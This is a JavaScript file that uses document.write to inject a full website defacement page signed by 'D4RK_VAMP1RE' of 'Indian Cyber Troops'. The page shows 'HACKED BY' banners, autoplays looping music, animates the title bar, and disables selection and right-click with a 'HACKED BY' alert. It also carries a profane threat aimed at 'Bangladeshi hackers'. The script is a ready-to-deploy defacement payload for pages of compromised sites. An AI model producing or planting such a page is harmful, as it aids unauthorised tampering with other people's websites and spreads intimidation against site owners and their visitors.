document.write( '<!DOCTYPE html>\n' );
document.write( '<html>\n' );
document.write( '<head>\n' );
document.write( '	<!------------------------------------------------------------->\n' );
document.write( '	<!--[ DEFACE PAGE MADE BY D4RK_VAMP1RE : SANDEEP VERMA ]-->\n' );
document.write( '	<!------------------------------------------------------------->\n' );
document.write( '	<meta charset=\"utf-8\">\n' );
document.write( '	<meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\n' );
document.write( '	<link rel=\"SHORTCUT ICON\" href=\"https://i.ibb.co/89SKTd2/20200123-195213.png\">\n' );
document.write( '	<title>HACKED BY INDIAN CYBER TROOPS</title>\n' );
document.write( '\n' );
document.write( '    <link href=\'https://fonts.googleapis.com/css?family=Kanit\' rel=\'stylesheet\' type=\'text/css\' />\n' );
document.write( '    <link href=\'https://fonts.googleapis.com/css?family=Share+Tech:400\' rel=\'stylesheet\' type=\'text/css\' />\n' );
document.write( '    <link href=\'https://fonts.googleapis.com/css?family=Cinzel:400\' rel=\'stylesheet\' type=\'text/css\' />\n' );
document.write( '          <link href=\"https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.5.2/animate.min.css\" rel=\"stylesheet\" />\n' );
document.write( '      <link href=\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css\" rel=\"stylesheet\" />\n' );
document.write( '      \n' );
document.write( '	<style type=\"text/css\">\n' );
document.write( '@import url(\'https://fonts.googleapis.com/css?family=Lobster&display=swap\') repeat scroll 0 0 rgba(0, 0, 0 , 0);\n' );
document.write( '\n' );
document.write( '@font-face { font-family: DaysLater; src: url(\'https://d4rk-vamp1re.github.io/js-host/28DaysLater-MA0x.ttf\'); } \n' );
document.write( ' .ict-log{\n' );
document.write( '         font-family: DaysLater;\n' );
document.write( '         text-align: center;\n' );
document.write( '      }\n' );
document.write( '\n' );
document.write( 'body { background-color: #000;\n' );
document.write( ' }\n' );
document.write( '\n' );
document.write( '.ict-log{\n' );
document.write( '  font-size: 36px;\n' );
document.write( '     text-shadow: 0 0 10px #000;\n' );
document.write( '     text-align: center;\n' );
document.write( '}\n' );
document.write( '\n' );
document.write( '   .vamp{\n' );
document.write( '   text-shadow: 0 0 10px #7200E6;\n' );
document.write( '   color: white;\n' );
document.write( '   } \n' );
document.write( '		img:hover{\n' );
document.write( '             animation: shake 1s;\n' );
document.write( '  			 animation-iteration-count: infinite;\n' );
document.write( '		}\n' );
document.write( '\n' );
document.write( '      @keyframes shake {\n' );
document.write( '           0% { transform: translate(1px, 1px) rotate(0deg); }\n' );
document.write( '           10% { transform: translate(-1px, -2px) rotate(-1deg); }\n' );
document.write( '           20% { transform: translate(-2px, 0px) rotate(1deg); }\n' );
document.write( '           30% { transform: translate(2px, 2px) rotate(0deg); }\n' );
document.write( '           40% { transform: translate(1px, -1px) rotate(1deg); }\n' );
document.write( '           50% { transform: translate(-1px, 2px) rotate(-1deg); }\n' );
document.write( '           60% { transform: translate(-2px, 1px) rotate(0deg); }\n' );
document.write( '           70% { transform: translate(2px, 1px) rotate(-1deg); }\n' );
document.write( '           80% { transform: translate(-1px, -1px) rotate(1deg); }\n' );
document.write( '           90% { transform: translate(1px, 2px) rotate(0deg); }\n' );
document.write( '           100% { transform: translate(1px, -2px) rotate(-1deg); }\n' );
document.write( '         }\n' );
document.write( '\n' );
document.write( '            .blueglow {\n' );
document.write( '   text-shadow: 0 0 10px #74E600;\n' );
document.write( '   color: white;\n' );
document.write( '   font-family: \"Kanit\";\n' );
document.write( '   } \n' );
document.write( '        .blink{\n' );
document.write( '      animation: blinker 0.6s linear infinite;\n' );
document.write( '      font-size: 25px;\n' );
document.write( '      color:  #f00000;\n' );
document.write( '      font-weight: bold;\n' );
document.write( '      text-align: center;\n' );
document.write( '      font-family: sans-serif;\n' );
document.write( '    }\n' );
document.write( '              @keyframes blinker {  \n' );
document.write( '      50% { opacity: 0; }\n' );
document.write( '      }\n' );
document.write( '\n' );
document.write( '      @font-face { font-family: FinaFont; src: url(\'FinalFrontierOldStyle-8Pg.ttf\'); } \n' );
document.write( ' .vamp{\n' );
document.write( '         font-family: \"Kanit\";\n' );
document.write( '         text-align: center;\n' );
document.write( '      }\n' );
document.write( '.legion{\n' );
document.write( '	color: white;\n' );
document.write( '	font-weight: bold;\n' );
document.write( '	font-size: 14px;\n' );
document.write( '	font-family: \"Kanit\";\n' );
document.write( '}\n' );
document.write( '      .team{\n' );
document.write( '        text-align: center;\n' );
document.write( '        font-family: \"Share Tech\";\n' );
document.write( '        font-size: 18px;\n' );
document.write( '      }\n' );
document.write( '	</style>\n' );
document.write( '</head>\n' );
document.write( '<body>\n' );
document.write( '\n' );
document.write( '	<script type=\"text/javascript\" src=\"https://aakashbapna.github.io/jet-planes/doodle.js\"></script>\n' );
document.write( '  <script type=\"text/javascript\">\n' );
document.write( '  doodle.init(\"http://aakashbapna.github.io/jet-planes/jet.png\");\n' );
document.write( '  </script>\n' );
document.write( '\n' );
document.write( '  <audio src=\"https://a.top4top.io/m_1619fnz1z1.mp3\" autoplay=\"autoplay\" loop=\"loop\"></audio>\n' );
document.write( '<center>\n' );
document.write( '\n' );
document.write( '\n' );
document.write( ' <div class=\"animated flip\">\n' );
document.write( '  <span>\n' );
document.write( ' <img src=\"https://i.ibb.co/89SKTd2/20200123-195213.png\" height=\"280\" width=\"280\"> \n' );
document.write( ' </span>\n' );
document.write( '</div>   \n' );
document.write( ' </center>\n' );
document.write( '\n' );
document.write( '<div class=\"wrapper\">\n' );
document.write( '  <h2 class=\"title\"></h2>\n' );
document.write( '  <center>\n' );
document.write( '  <p class=\"vamp\">[-]-=[ HACKED BY D4RK_VAMP1RE ]=-[-]</p>\n' );
document.write( '  <p class=\"legion\">//-[ WE ARE LEGION ! WE ARE UNSTOPABLE ]-\\</p>\n' );
document.write( '  <p class=\"ict-log\"><font color=\"#FFA500\">INDIAN</font> <font color=\"white\">CYBER</font> <font color=\"#32CD32\">TROOPS</font></p>\n' );
document.write( '  </center>\n' );
document.write( '</div>\n' );
document.write( '<center>\n' );
document.write( '<p style=\"font-weight: bold; font-family: sans-serif; font-size: 25px;\"><font color=\"white\">[</font><font class=\"blink\" color=\"red\"> REASON </font><font color=\"white\">]</font></p>\n' );
document.write( '</center>\n' );
document.write( '<center>\n' );
document.write( '<span class=\"blueglow\" style=\"font-size: 12px; text-align: center;\">\n' );
document.write( 'A MESSAGE TO BANGLADESHI HACKERS. STAY AWAY FROM INDIAN CYBER SPACE OTHERWISE WE WILL F**K YOU AND YOUR CYBER SPACE COMPLETELY.\n' );
document.write( '</span>\n' );
document.write( '</center>\n' );
document.write( '<br><br><br>\n' );
document.write( '<span>\n' );
document.write( '	<p class=\"team\"><font size=\"4\" style=\"color: white;\"> :: GREETZ TO ::</font><br>\n' );
document.write( '  <font color=\"white\">[</font><font color=\"red\"> ALL INDIAN HACKERS </font><font color=\"white\">]</font>\n' );
document.write( '</p>\n' );
document.write( '</span>\n' );
document.write( '\n' );
document.write( '    <script type=\"text/javascript\">\n' );
document.write( 'var rev = \"silent\";\n' );
document.write( 'function titlebar(val)\n' );
document.write( '{\n' );
document.write( '    var msg  = \"//--[ HACKED BY D4RK_VAMP1RE ]\";\n' );
document.write( '    var res = \" \";\n' );
document.write( '    var speed = 70\n' );
document.write( '    var pos = val;\n' );
document.write( '\n' );
document.write( '    msg = \"\"+msg+\"\";\n' );
document.write( '    var le = msg.length;\n' );
document.write( '    if(rev == \"silent\"){\n' );
document.write( '        if(pos < le){\n' );
document.write( '        pos = pos+1;\n' );
document.write( '        scroll = msg.substr(0,pos);\n' );
document.write( '        document.title = scroll;\n' );
document.write( '        timer = window.setTimeout(\"titlebar(\"+pos+\")\",speed);\n' );
document.write( '        }\n' );
document.write( '        else{\n' );
document.write( '        rev = \"silents\";\n' );
document.write( '        timer = window.setTimeout(\"titlebar(\"+pos+\")\",speed);\n' );
document.write( '        }\n' );
document.write( '    }\n' );
document.write( '    else{\n' );
document.write( '        if(pos > 0){\n' );
document.write( '        pos = pos-1;\n' );
document.write( '        var ale = le-pos;\n' );
document.write( '        scrol = msg.substr(ale,le);\n' );
document.write( '        document.title = scrol;\n' );
document.write( '        timer = window.setTimeout(\"titlebar(\"+pos+\")\",speed);\n' );
document.write( '        }\n' );
document.write( '        else{\n' );
document.write( '        rev = \"silent\";\n' );
document.write( '        timer = window.setTimeout(\"titlebar(\"+pos+\")\",speed);\n' );
document.write( '        }   \n' );
document.write( '    }\n' );
document.write( '}\n' );
document.write( '\n' );
document.write( 'titlebar(0);\n' );
document.write( '</script>\n' );
document.write( '\n' );
document.write( '<script type=\"text/javascript\">\n' );
document.write( 'function disableselect(e) {\n' );
document.write( 'return false\n' );
document.write( '}\n' );
document.write( 'function reEnable() {\n' );
document.write( 'return true\n' );
document.write( '}\n' );
document.write( 'document.onselectstart = new Function(\"return false\")\n' );
document.write( 'if (window.sidebar) {\n' );
document.write( 'document.onmousedown = disableselect\n' );
document.write( 'document.onclick = reEnable\n' );
document.write( '}\n' );
document.write( 'var message = \"\";\n' );
document.write( 'function clickIE() {\n' );
document.write( 'if (document.all) {\n' );
document.write( '(message);\n' );
document.write( 'return false;\n' );
document.write( '}\n' );
document.write( '}\n' );
document.write( 'function clickNS(e) {\n' );
document.write( 'if (document.layers || (document.getElementById && !document.all)) {\n' );
document.write( 'if (e.which == 2 || e.which == 3) {\n' );
document.write( '(message);\n' );
document.write( 'return false;\n' );
document.write( '}\n' );
document.write( '}\n' );
document.write( '}\n' );
document.write( 'if (document.layers) {\n' );
document.write( 'document.captureEvents(Event.MOUSEDOWN);\n' );
document.write( 'document.onmousedown = clickNS;\n' );
document.write( '} else {\n' );
document.write( 'document.onmouseup = clickNS;\n' );
document.write( 'document.oncontextmenu = clickIE;\n' );
document.write( '}\n' );
document.write( 'document.oncontextmenu = new Function(\'alert(\"HACKED BY D4RK_VAMP1RE !!\"); return false\')	\n' );
document.write( '</script>\n' );
document.write( '\n' );
document.write( '\n' );
document.write( '</body>\n' );
document.write( '</html>' );
